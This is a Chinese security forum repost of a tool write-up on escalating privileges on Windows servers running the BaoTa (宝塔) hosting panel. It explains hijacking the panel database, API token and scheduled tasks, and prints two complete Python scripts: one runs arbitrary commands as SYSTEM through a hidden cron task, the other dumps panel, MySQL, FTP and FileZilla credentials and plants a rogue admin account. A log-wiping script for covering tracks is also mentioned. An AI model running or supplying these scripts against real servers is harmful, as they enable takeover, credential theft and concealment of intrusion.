设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 干货 | 宝塔面板Windows提权方法
返回列表 发新帖
查看: 7540|回复: 0

干货 | 宝塔面板Windows提权方法

[复制链接]
gclome

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-1-26 22:40:03 | 显示全部楼层 |阅读模式
本帖最后由 gclome 于 2021-1-26 22:41 编辑

原文链接:干货 | 宝塔面板Windows提权方法


本项目整理一些宝塔特性,可以在无漏洞的情况下利用这些特性来增加提权的机会。

项目地址:https://github.com/Hzllaga/BT_Panel_Privilege_Escalation
记得点个Star!

Table of Contents
  • 宝塔面板Windows提权方法
    • 写数据库提权
    • API提权
    • 计划任务提权
  • 自动化测试
写数据库提权
宝塔面板在2008安装的时候默认www用户是可以对宝塔面板的数据库有完全控制权限的:
  1. powershell -Command "get-acl C:\BtSoft\panel\data\default.db | format-list"
复制代码



对于这种情况可以直接往数据库写一个面板的账号直接获取到面板权限,而在2016安装默认是User权限可读不可写

这种情况可以从里面读取一些敏感信息,比如mysql的root密码,而一般这个配置的不会只有这个文件可读,可以使用其他方法。
盐: [A-Za-z0-9]{12}
密码: md5(md5(md5(password) + '_bt.cn') + salt)
可以直接使用bt_panel_script.py,脚本会自动新建一个账号。
API提权
宝塔面板支持API操作的,token在C:\BtSoft\panel\config\api.json,用这个方法提权还可以无视入口校验,比如有一个未授权访问的redis是system权限,就可以直接往这个文件覆盖token直接接管面板,或是利用FileZilla(windows面板默认ftp软件就是FileZilla + 空密码)新建一个C盘权限的账号,也可以去修改那个文件来提权。
API Token: md5(string)
api.json

  1. {"open": true, "token": "API Token", "limit_addr": ["你的IP"]}
复制代码
请求时加上(multipart/form-data):

  1. request_token = md5(timestamp + token)
  2. request_time = timestamp
复制代码

可以直接使用bt_panel_api.py,脚本会自动使用计划任务运行命令,如果面板原本就有配置好API了,并且IP限制127.0.0.1,那么就可以直接端口转发出来直接用脚本提权。


计划任务提权
基本上场景同API提权,可以去修改计划任务文件(比如网站备份),默认是在凌晨1:30执行,权限也是system。
  1. 路径: C:/BtSoft/cron/
复制代码

有些面板API会无法登陆,就只能利用计划任务来提权了,缺点是路径不固定,且执行时间也不固定。
自动化测试
  1. python3 .\bt_panel_script.py
复制代码

使用此脚本可以全自动获取宝塔相关信息,python可以直接用宝塔的,不用担心没环境。


python3 .\bt_panel_api.py -g

这个脚本可以生成api示例,把生成的json替换到指定文件后就能提权。

python3 .\bt_panel_api.py -u "http://192.168.101.5:8888/" -t "085bd64a698cf601ae472425656b2346" -c whoami

python3 .\bt_panel_log_delete.py
这个脚本可以自动清理面板日志

脚本源码,也可以在github地址下载

bt_panel_api.py
  1. import requests
  2. import argparse
  3. import hashlib
  4. import json
  5. import time
  6. import cowsay


  9. def md5(string):
  10.     return hashlib.md5(string.encode()).hexdigest()


  13. def get_random_string(length):
  14.     from random import Random
  15.     strings = ''
  16.     chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
  17.     char_len = len(chars) - 1
  18.     random = Random()
  19.     for i in range(length):
  20.         strings += chars[random.randint(0, char_len)]
  21.     return strings


  24. def get_ip():
  25.     return requests.get(url='https://ifconfig.me/ip').text


  28. def generate_example_config():
  29.     token = md5(get_random_string(10))
  30.     payload = {
  31.         'open': True,
  32.         'token': token,
  33.         'limit_addr': [get_ip()]
  34.     }
  35.     print(json.dumps(payload))
  36.     print('请保存在目标C:\\BtSoft\\panel\\config\\api.json')
  37.     print(f"Usage: python bt_panel_api.py -u [URL] -t {token} -c whoami")


  40. def exploit(url, token, cmd):
  41.     # api sk
  42.     timestamp = int(time.time())
  43.     token = md5(str(timestamp) + token)
  44.     api_sk = {
  45.         'request_token': (None, f'{token}'),
  46.         'request_time': (None, f'{timestamp}'),
  47.     }
  48.     crontab_name = get_random_string(10)
  49.     # Add a crontab
  50.     payload = {
  51.         'sType': (None, 'toShell'),
  52.         'name': (None, f'{crontab_name}'),
  53.         'type': (None, 'day'),
  54.         'hour': (None, '1'),
  55.         'minute': (None, '30'),
  56.         'sBody': (None, f'{cmd}'),
  57.         'sName': (None, ''),
  58.         'save': (None, ''),
  59.         'backupTo': (None, 'localhost'),
  60.     }
  61.     payload.update(api_sk)
  62.     requests.post(url=f'{url}/crontab?action=AddCrontab', files=payload)

  64.     # Get crontab list
  65.     payload = {
  66.         'page': (None, '1'),
  67.         'search': (None, ''),
  68.     }
  69.     payload.update(api_sk)
  70.     crontab = json.loads(requests.post(url=f'{url}/crontab?action=GetCrontab', files=payload).text)

  72.     # Start crontab
  73.     payload = {
  74.         # 新添加的会在第一条
  75.         'id': (None, f"{crontab[0]['id']}"),
  76.     }
  77.     payload.update(api_sk)
  78.     requests.post(url=f'{url}/crontab?action=StartTask', files=payload)

  80.     # Waiting for execution
  81.     time.sleep(3)

  83.     # Read the crontab log
  84.     log = json.loads(requests.post(url=f'{url}/crontab?action=GetLogs', files=payload).text)
  85.     print(log['msg'])

  87.     # Delete crontab
  88.     requests.post(url=f'{url}/crontab?action=DelCrontab', files=payload)


  91. if __name__ == '__main__':
  92.     cowsay.cow('BaoTa Panel Privilege escalation tool\nAuthor: https://github.com/Hzllaga')
  93.     parser = argparse.ArgumentParser()
  94.     parser.add_argument("-g", "--generate", action="store_true", help='生成一个api示例.')
  95.     parser.add_argument("-u", "--url", help='宝塔地址.')
  96.     parser.add_argument("-t", "--token", help='API token.')
  97.     parser.add_argument("-c", "--command", help='要执行的命令.')
  98.     args = parser.parse_args()
  99.     if args.generate:
  100.         generate_example_config()
  101.     else:
  102.         if (args.url is not None) & (args.token is not None) & (args.command is not None):
  103.             exploit(url=args.url, token=args.token, cmd=args.command)
  104.         else:
  105.             print('缺少参数')
复制代码

bt_panel_script.py
  1. # -*- coding:utf-8 -*-
  2. import sqlite3


  5. class BT:
  6.     def __init__(self):
  7.         self.conn = sqlite3.connect('C:/BtSoft/panel/data/default.db')
  8.         self.c = self.conn.cursor()

  10.     @staticmethod
  11.     def read_file(path):
  12.         with open(path, 'r') as file:
  13.             return file.read()

  15.     @staticmethod
  16.     def get_random_string(length):
  17.         from random import Random
  18.         strings = ''
  19.         chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
  20.         char_len = len(chars) - 1
  21.         random = Random()
  22.         for i in range(length):
  23.             strings += chars[random.randint(0, char_len)]
  24.         return strings

  26.     @staticmethod
  27.     def md5(string):
  28.         import hashlib
  29.         return hashlib.md5(string.encode()).hexdigest()

  31.     def hash_password(self, password, salt):
  32.         return self.md5(self.md5(self.md5(password) + '_bt.cn') + salt)

  34.     def get_panel_path(self):
  35.         return self.read_file('C:/BtSoft/panel/data/admin_path.pl')

  37.     def get_default_username(self):
  38.         cursor = self.c.execute('select username from users where id=1')
  39.         return cursor.fetchone()[0]

  41.     def get_default_password(self):
  42.         return self.read_file('C:/BtSoft/panel/data/default.pl')

  44.     def get_all_user(self):
  45.         cursor = self.c.execute('select username, password, salt from users')
  46.         return cursor.fetchall()

  48.     def get_api_information(self):
  49.         import json
  50.         api_data = json.loads(self.read_file('C:/BtSoft/panel/config/api.json'))
  51.         if api_data['open']:
  52.             token = api_data['token']
  53.             limit_ip = api_data['limit_addr']
  54.             return f'Token: {token}, 限制IP: {limit_ip}'
  55.         else:
  56.             return '未开启api'

  58.     def get_mysql_root_password(self):
  59.         cursor = self.c.execute('select mysql_root from config')
  60.         return cursor.fetchone()[0]

  62.     def insert_panel_user(self, username, password, salt):
  63.         password = self.hash_password(password, salt)
  64.         try:
  65.             sql = f"INSERT INTO users (username,password,salt,email) VALUES ('{username}', '{password}', '{salt}', 'admin@qq.com')"
  66.             self.c.execute(sql)
  67.             self.conn.commit()
  68.             return '写入成功!'
  69.         except sqlite3.OperationalError:
  70.             return '写入失败。'

  72.     def get_database_users(self):
  73.         cursor = self.c.execute('select name, username, password, type from databases')
  74.         return cursor.fetchall()

  76.     def get_ftp_users(self):
  77.         cursor = self.c.execute('select name, password from ftps')
  78.         return cursor.fetchall()

  80.     def get_filezilla_interface(self):
  81.         from xml.etree.ElementTree import fromstring
  82.         ftp_xml = ''
  83.         try:
  84.             ftp_xml = self.read_file('C:/BtSoft/ftpServer/FileZilla Server Interface.xml')
  85.             root = fromstring(ftp_xml)
  86.             server = root.findall('./Settings/Item[@name="Last Server Address"]')[0].text
  87.             port = root.findall('./Settings/Item[@name="Last Server Port"]')[0].text
  88.             password = root.findall('./Settings/Item[@name="Last Server Password"]')[0].text
  89.             return f'已安装!\n{server}:{port} 密码: {password}'
  90.         except FileNotFoundError:
  91.             return '未安装Filezilla'


  94. def banner():
  95.     print('''  _____________________________________
  96. / BaoTa Panel Privilege escalation tool \\
  97. \\ Author: https://github.com/Hzllaga    /
  98.   -------------------------------------
  99.          \\   ^__^
  100.           \\  (oo)\\_______
  101.              (__)\\       )\\/\\
  102.                  ||----w |
  103.                  ||     ||
  104.     ''')


  107. if __name__ == '__main__':
  108.     banner()
  109.     bt = BT()
  110.     print('===========================================')
  111.     print(f'登录位置: {bt.get_panel_path()}')
  112.     print(f'默认账号: {bt.get_default_username()}')
  113.     print(f'默认密码: {bt.get_default_password()}')
  114.     print()
  115.     salt = bt.get_random_string(12)
  116.     username = bt.get_random_string(6)
  117.     password = bt.get_random_string(10)
  118.     print(f'尝试写入 账号:{username} 密码:{password} 的面板用户:')
  119.     print(f'{bt.insert_panel_user(username, password, salt)}')
  120.     print('===========================================')
  121.     print('面板用户信息:')
  122.     for user in bt.get_all_user():
  123.         print(f'账号: {user[0]}, 密码: {user[1]}, 盐: {user[2]}')
  124.     print('===========================================')
  125.     print('面板API状态:')
  126.     print(f'{bt.get_api_information()}')
  127.     print('如果已开启且限制IP为服务器IP可以端口转发直接秒!')
  128.     print('===========================================')
  129.     print(f'MySQL root密码: {bt.get_mysql_root_password()}')
  130.     print('===========================================')
  131.     print('数据库用户信息:')
  132.     for db_user in bt.get_database_users():
  133.         print(f'库名: {db_user[0]}, 用户: {db_user[1]}, 密码: {db_user[2]}, 类型: {db_user[3]}')
  134.     print('===========================================')
  135.     print('FTP用户信息:')
  136.     for ftp_user in bt.get_ftp_users():
  137.         print(f'用户: {ftp_user[0]}, 密码: {ftp_user[1]}')
  138.     print('===========================================')
  139.     print('Filezilla Interface配置信息:')
  140.     print(f'{bt.get_filezilla_interface()}')
  141.     print('如果已安装可以通过API或计划任务直接秒!')
  142.     print('===========================================')
复制代码



















回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 20:45 , Processed in 0.013189 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表